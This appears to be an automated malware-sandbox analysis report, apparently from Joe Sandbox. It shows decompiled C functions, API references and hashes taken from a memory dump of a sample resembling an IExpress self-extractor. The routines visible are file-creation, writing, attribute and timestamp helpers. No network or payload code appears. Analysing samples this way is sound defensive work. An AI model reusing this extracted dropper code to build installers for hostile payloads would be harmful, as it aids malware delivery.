                                                                                                                                                                                                        0x00bc4d42
                                                                                                                                                                                                        0x00bc4d43
                                                                                                                                                                                                        0x00bc4d43
                                                                                                                                                                                                        0x00bc4d47
                                                                                                                                                                                                        0x00bc4d4a
                                                                                                                                                                                                        0x00bc4d4a
                                                                                                                                                                                                        0x00bc4d4c
                                                                                                                                                                                                        0x00bc4d4f
                                                                                                                                                                                                        0x00bc4d4f
                                                                                                                                                                                                        0x00bc4d51
                                                                                                                                                                                                        0x00bc4d52
                                                                                                                                                                                                        0x00bc4d52
                                                                                                                                                                                                        0x00bc4d56
                                                                                                                                                                                                        0x00bc4d5b
                                                                                                                                                                                                        0x00bc4d5d
                                                                                                                                                                                                        0x00bc4d62
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc4d67
                                                                                                                                                                                                        0x00bc4d6f
                                                                                                                                                                                                        0x00bc4d74
                                                                                                                                                                                                        0x00bc4d76
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc4d7c
                                                                                                                                                                                                        0x00bc4d84
                                                                                                                                                                                                        0x00bc4d89
                                                                                                                                                                                                        0x00bc4d8b
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc4d94
                                                                                                                                                                                                        0x00bc4d99
                                                                                                                                                                                                        0x00bc4d9e
                                                                                                                                                                                                        0x00bc4da1
                                                                                                                                                                                                        0x00bc4daa
                                                                                                                                                                                                        0x00bc4daa
                                                                                                                                                                                                        0x00bc4da3
                                                                                                                                                                                                        0x00bc4da3
                                                                                                                                                                                                        0x00bc4da3
                                                                                                                                                                                                        0x00bc4db5
                                                                                                                                                                                                        0x00bc4dbb
                                                                                                                                                                                                        0x00bc4dbd
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc4dc3
                                                                                                                                                                                                        0x00bc4dc5
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc4dc5
                                                                                                                                                                                                        0x00bc4dbd
                                                                                                                                                                                                        0x00bc4d2a
                                                                                                                                                                                                        0x00bc4d2a
                                                                                                                                                                                                        0x00bc4d2d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00bc4d2d
                                                                                                                                                                                                        0x00bc4cf8
                                                                                                                                                                                                        0x00bc4cfd
                                                                                                                                                                                                        0x00bc4d02
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00BC4DB5
                                                                                                                                                                                                        • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 00BC4DDD
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AttributesFileItemText
                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                        • API String ID: 3625706803-3290032183
                                                                                                                                                                                                        • Opcode ID: 32b2f9ab0af11ddc439431dfcfc3fa865db8b531bacb8efe6f108498f94c92aa
                                                                                                                                                                                                        • Instruction ID: 3f47993a30b0ee776e1380f39870ecae5723a342359c6431f18a21cba917314e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 32b2f9ab0af11ddc439431dfcfc3fa865db8b531bacb8efe6f108498f94c92aa
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0241DE362002069ACB25AF28D9A8FB673E5EB45300B0846FDE88397295DB31DF4AC750
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00BC4C37(signed int __ecx, int __edx, int _a4) {
                                                                                                                                                                                                        				struct _FILETIME _v12;
                                                                                                                                                                                                        				struct _FILETIME _v20;
                                                                                                                                                                                                        				FILETIME* _t14;
                                                                                                                                                                                                        				int _t15;
                                                                                                                                                                                                        				signed int _t21;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t21 = __ecx * 0x18;
                                                                                                                                                                                                        				if( *((intOrPtr*)(_t21 + 0xbc8d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                                                                                                                                                                                                        					L5:
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					_t14 =  &_v12;
                                                                                                                                                                                                        					_t15 = SetFileTime( *(_t21 + 0xbc8d74), _t14, _t14, _t14); // executed
                                                                                                                                                                                                        					if(_t15 == 0) {
                                                                                                                                                                                                        						goto L5;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					return 1;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}









                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00BC4C54
                                                                                                                                                                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00BC4C66
                                                                                                                                                                                                        • SetFileTime.KERNELBASE(?,?,?,?), ref: 00BC4C7E
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Time$File$DateLocal
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2071732420-0
                                                                                                                                                                                                        • Opcode ID: 45b4875524907a125c6e1e32b6864f6a10e6fcc2c174e97f7cc0846ffdbe35a2
                                                                                                                                                                                                        • Instruction ID: f3b8e5737adf416798d3df8350f65713ab83b63642e21460b83ac17f1cfc80b6
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 45b4875524907a125c6e1e32b6864f6a10e6fcc2c174e97f7cc0846ffdbe35a2
                                                                                                                                                                                                        • Instruction Fuzzy Hash: CDF06D7260120CBF9B249FA5CC59EBB77ECEB09345B48056EA816D2060EB30DA14C7B0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                                                                        			E00BC487A(CHAR* __ecx, signed int __edx) {
                                                                                                                                                                                                        				void* _t7;
                                                                                                                                                                                                        				CHAR* _t11;
                                                                                                                                                                                                        				long _t18;
                                                                                                                                                                                                        				long _t23;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t11 = __ecx;
                                                                                                                                                                                                        				asm("sbb edi, edi");
                                                                                                                                                                                                        				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                                                                                                                                                                                                        				if((__edx & 0x00000100) == 0) {
                                                                                                                                                                                                        					asm("sbb esi, esi");
                                                                                                                                                                                                        					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					if((__edx & 0x00000400) == 0) {
                                                                                                                                                                                                        						asm("sbb esi, esi");
                                                                                                                                                                                                        						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t23 = 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                                                                                                                                                                                                        				if(_t7 != 0xffffffff || _t23 == 3) {
                                                                                                                                                                                                        					return _t7;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					E00BC490C(_t11);
                                                                                                                                                                                                        					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}








                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,00BC4A23,?,00BC4F67,*MEMCAB,00008000,00000180), ref: 00BC48DE
                                                                                                                                                                                                        • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00BC4F67,*MEMCAB,00008000,00000180), ref: 00BC4902
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                                                        • Opcode ID: 007de0bda2d562d8ad2b4610da47f0c13a56d05c814a4c045add4c5b63cda68f
                                                                                                                                                                                                        • Instruction ID: 44c7e58ef88eb2026ba374e1851d7279775e20d625b850c37313939eadd06275
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 007de0bda2d562d8ad2b4610da47f0c13a56d05c814a4c045add4c5b63cda68f
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E4016DA3E115742AF32441294C99FB7559CCBDA734F1B0378BDEAF71D1DA644D0481E0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E00BC4AD0(signed int _a4, void* _a8, long _a12) {
                                                                                                                                                                                                        				signed int _t9;
                                                                                                                                                                                                        				int _t12;
                                                                                                                                                                                                        				signed int _t14;
                                                                                                                                                                                                        				signed int _t15;
                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                        				struct HWND__* _t21;
                                                                                                                                                                                                        				signed int _t24;
                                                                                                                                                                                                        				signed int _t25;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t20 =  *0xbc858c; // 0x268
                                                                                                                                                                                                        				_t9 = E00BC3680(_t20);
                                                                                                                                                                                                        				if( *0xbc91d8 == 0) {
                                                                                                                                                                                                        					_push(_t24);
                                                                                                                                                                                                        					_t12 = WriteFile( *(0xbc8d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                                                                                                                                                                                                        					if(_t12 != 0) {
                                                                                                                                                                                                        						_t25 = _a12;
                                                                                                                                                                                                        						if(_t25 != 0xffffffff) {
                                                                                                                                                                                                        							_t14 =  *0xbc9400; // 0x51c07
                                                                                                                                                                                                        							_t15 = _t14 + _t25;
                                                                                                                                                                                                        							 *0xbc9400 = _t15;
                                                                                                                                                                                                        							if( *0xbc8184 != 0) {
                                                                                                                                                                                                        								_t21 =  *0xbc8584; // 0x0
                                                                                                                                                                                                        								if(_t21 != 0) {
                                                                                                                                                                                                        									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0xbc93f8, 0);
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t25 = _t24 | 0xffffffff;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					return _t25;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					return _t9 | 0xffffffff;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}












                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 00BC3680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 00BC369F
                                                                                                                                                                                                          • Part of subcall function 00BC3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00BC36B2
                                                                                                                                                                                                          • Part of subcall function 00BC3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00BC36DA
                                                                                                                                                                                                        • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 00BC4B05
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1084409-0
                                                                                                                                                                                                        • Opcode ID: de071b1454fc42d8138beacc66e0166feb87ad8a221d0a87985751f18808b5d7
                                                                                                                                                                                                        • Instruction ID: d2945f131c537c039c3b7412b0dc03d0b8fdf62357d2225abd027bf092c40681
                                                                                                                                                                                                        • Opcode Fuzzy Hash: de071b1454fc42d8138beacc66e0166feb87ad8a221d0a87985751f18808b5d7
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 28019231240205ABE7148F58EC19FA27799F748726F0882A9FA39A71E0CF70DD11CB50
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00BC658A(char* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                        				intOrPtr _t4;
                                                                                                                                                                                                        				char* _t6;
                                                                                                                                                                                                        				char* _t8;
                                                                                                                                                                                                        				void* _t10;
                                                                                                                                                                                                        				void* _t12;
                                                                                                                                                                                                        				char* _t16;
                                                                                                                                                                                                        				intOrPtr* _t17;
                                                                                                                                                                                                        				void* _t18;
                                                                                                                                                                                                        				char* _t19;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t16 = __ecx;
                                                                                                                                                                                                        				_t10 = __edx;
                                                                                                                                                                                                        				_t17 = __ecx;
                                                                                                                                                                                                        				_t1 = _t17 + 1; // 0xbc8b3f
                                                                                                                                                                                                        				_t12 = _t1;
                                                                                                                                                                                                        				do {
                                                                                                                                                                                                        					_t4 =  *_t17;
                                                                                                                                                                                                        					_t17 = _t17 + 1;
                                                                                                                                                                                                        				} while (_t4 != 0);
                                                                                                                                                                                                        				_t18 = _t17 - _t12;
                                                                                                                                                                                                        				_t2 = _t18 + 1; // 0xbc8b40
                                                                                                                                                                                                        				if(_t2 < __edx) {
                                                                                                                                                                                                        					_t19 = _t18 + __ecx;
                                                                                                                                                                                                        					if(_t19 > __ecx) {
                                                                                                                                                                                                        						_t8 = CharPrevA(__ecx, _t19); // executed
                                                                                                                                                                                                        						if( *_t8 != 0x5c) {
                                                                                                                                                                                                        							 *_t19 = 0x5c;
                                                                                                                                                                                                        							_t19 =  &(_t19[1]);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t6 = _a4;
                                                                                                                                                                                                        					 *_t19 = 0;
                                                                                                                                                                                                        					while( *_t6 == 0x20) {
                                                                                                                                                                                                        						_t6 = _t6 + 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					return E00BC16B3(_t16, _t10, _t6);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return 0x8007007a;
                                                                                                                                                                                                        			}













                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CharPrevA.USER32(00BC8B3E,00BC8B3F,00000001,00BC8B3E,-00000003,?,00BC60EC,00BC1140,?), ref: 00BC65BA
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CharPrev
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 122130370-0
                                                                                                                                                                                                        • Opcode ID: cc3300d49a111ca121a23592a6743a361e48da724a8288e099e23ef74eb920a4
                                                                                                                                                                                                        • Instruction ID: 500fa09462b2ee63d25098fc4e17b0d4095733a6eec0a04da56ce80b7558cb11
                                                                                                                                                                                                        • Opcode Fuzzy Hash: cc3300d49a111ca121a23592a6743a361e48da724a8288e099e23ef74eb920a4
                                                                                                                                                                                                        • Instruction Fuzzy Hash: FEF042725042545BD331051D9884F66BFDDDBEA350F3801EEE8DAD3205DA554C4583A0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E00BC621E() {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				signed int _t5;
                                                                                                                                                                                                        				void* _t9;
                                                                                                                                                                                                        				void* _t13;
                                                                                                                                                                                                        				void* _t19;
                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                        				signed int _t21;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t5 =  *0xbc8004; // 0x9f7d84ca
                                                                                                                                                                                                        				_v8 = _t5 ^ _t21;
                                                                                                                                                                                                        				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                        					0x4f0 = 2;
                                                                                                                                                                                                        					_t9 = E00BC597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					E00BC44B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                        					 *0xbc9124 = E00BC6285();
                                                                                                                                                                                                        					_t9 = 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00BC6CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                                                                                                                                                                                                        			}












                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00BC623F
                                                                                                                                                                                                          • Part of subcall function 00BC44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00BC4518
                                                                                                                                                                                                          • Part of subcall function 00BC44B9: MessageBoxA.USER32(?,?,photo660,00010010), ref: 00BC4554
                                                                                                                                                                                                          • Part of subcall function 00BC6285: GetLastError.KERNEL32(00BC5BBC), ref: 00BC6285
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 381621628-0
                                                                                                                                                                                                        • Opcode ID: 7b8c2733f3872bb6ac7097ee7c8625858cfda9c09af8bafa97216a89e2a609f1
                                                                                                                                                                                                        • Instruction ID: 7edb0448fa18341c40fe7aaf979474f53b87f94d330bab4b6872e483d8c28e30
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7b8c2733f3872bb6ac7097ee7c8625858cfda9c09af8bafa97216a89e2a609f1
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2BF0BEB0600208ABE760EB748D06FBA33ECDB58300F4000AEA986DB191EEB499848650
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00BC4B60(signed int _a4) {
                                                                                                                                                                                                        				signed int _t9;
                                                                                                                                                                                                        				signed int _t15;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t15 = _a4 * 0x18;
                                                                                                                                                                                                        				if( *((intOrPtr*)(_t15 + 0xbc8d64)) != 1) {
                                                                                                                                                                                                        					_t9 = FindCloseChangeNotification( *(_t15 + 0xbc8d74)); // executed
                                                                                                                                                                                                        					if(_t9 == 0) {
                                                                                                                                                                                                        						return _t9 | 0xffffffff;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					 *((intOrPtr*)(_t15 + 0xbc8d60)) = 1;
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				 *((intOrPtr*)(_t15 + 0xbc8d60)) = 1;
                                                                                                                                                                                                        				 *((intOrPtr*)(_t15 + 0xbc8d68)) = 0;
                                                                                                                                                                                                        				 *((intOrPtr*)(_t15 + 0xbc8d70)) = 0;
                                                                                                                                                                                                        				 *((intOrPtr*)(_t15 + 0xbc8d6c)) = 0;
                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                        			}






                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00BC4FA1,00000000), ref: 00BC4B98
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2591292051-0
                                                                                                                                                                                                        • Opcode ID: 87b96cc55a14af5444cfbbee965797e5026149ff463b544e938cd9425555d6e6
                                                                                                                                                                                                        • Instruction ID: fc737ce1a54f59691b0813fe2f81da95fbbeee337941f22959760662eabf415b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 87b96cc55a14af5444cfbbee965797e5026149ff463b544e938cd9425555d6e6
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F7F0FE71600B089E87618E399C00F53BBE4EAB6B613160D3E946FD2190DB30A945CBA0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00BC66AE(CHAR* __ecx) {
                                                                                                                                                                                                        				unsigned int _t1;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t1 = GetFileAttributesA(__ecx); // executed
                                                                                                                                                                                                        				if(_t1 != 0xffffffff) {
                                                                                                                                                                                                        					return  !(_t1 >> 4) & 0x00000001;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}





                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetFileAttributesA.KERNELBASE(?,00BC4777,?,00BC4E38,?), ref: 00BC66B1
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                                                                                        • Opcode ID: 8078ce2b14f5cffdb8cd6cf71abaa3e350055493171253c378ebcfa95feed538
                                                                                                                                                                                                        • Instruction ID: da81f1fe12b11479d3ad0f935a66fcb8684d977a170b83ceac1225e1afacfd2e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8078ce2b14f5cffdb8cd6cf71abaa3e350055493171253c378ebcfa95feed538
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 59B09276222444426A2006716C29E962981E6C123A7E41BA4F032C11E0CE3ED846E004
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00BC4CA0(long _a4) {
                                                                                                                                                                                                        				void* _t2;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t2 = GlobalAlloc(0, _a4); // executed
                                                                                                                                                                                                        				return _t2;
                                                                                                                                                                                                        			}




                                                                                                                                                                                                        0x00bc4caa
                                                                                                                                                                                                        0x00bc4cb1

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GlobalAlloc.KERNELBASE(00000000,?), ref: 00BC4CAA
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.440024112.0000000000BC1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00BC0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.440014695.0000000000BC0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440037612.0000000000BC8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.440047194.0000000000BCC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_bc0000_v6434086.jbxd
                                                                                                                                                                                                        Similarity
